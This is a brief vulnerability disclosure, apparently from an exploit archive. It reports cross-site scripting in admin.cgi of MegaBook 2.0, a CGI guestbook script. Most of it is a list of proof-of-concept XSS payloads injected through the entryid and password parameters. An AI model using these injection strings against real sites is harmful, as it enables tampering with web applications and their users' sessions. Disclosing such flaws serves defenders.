Ultimate CGI Guestbook Scripts MegaBook version 2.0 is vulnerable to multiple cross site scripting attacks.
69540585fe0f27145e6811e2c70cdf8addf7a7e32745d148840ce097b8d9b69f
The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
I have tested the script with the following query:
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>
I have also tested the script with theses POST variables:
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>
Yours,
SpyHat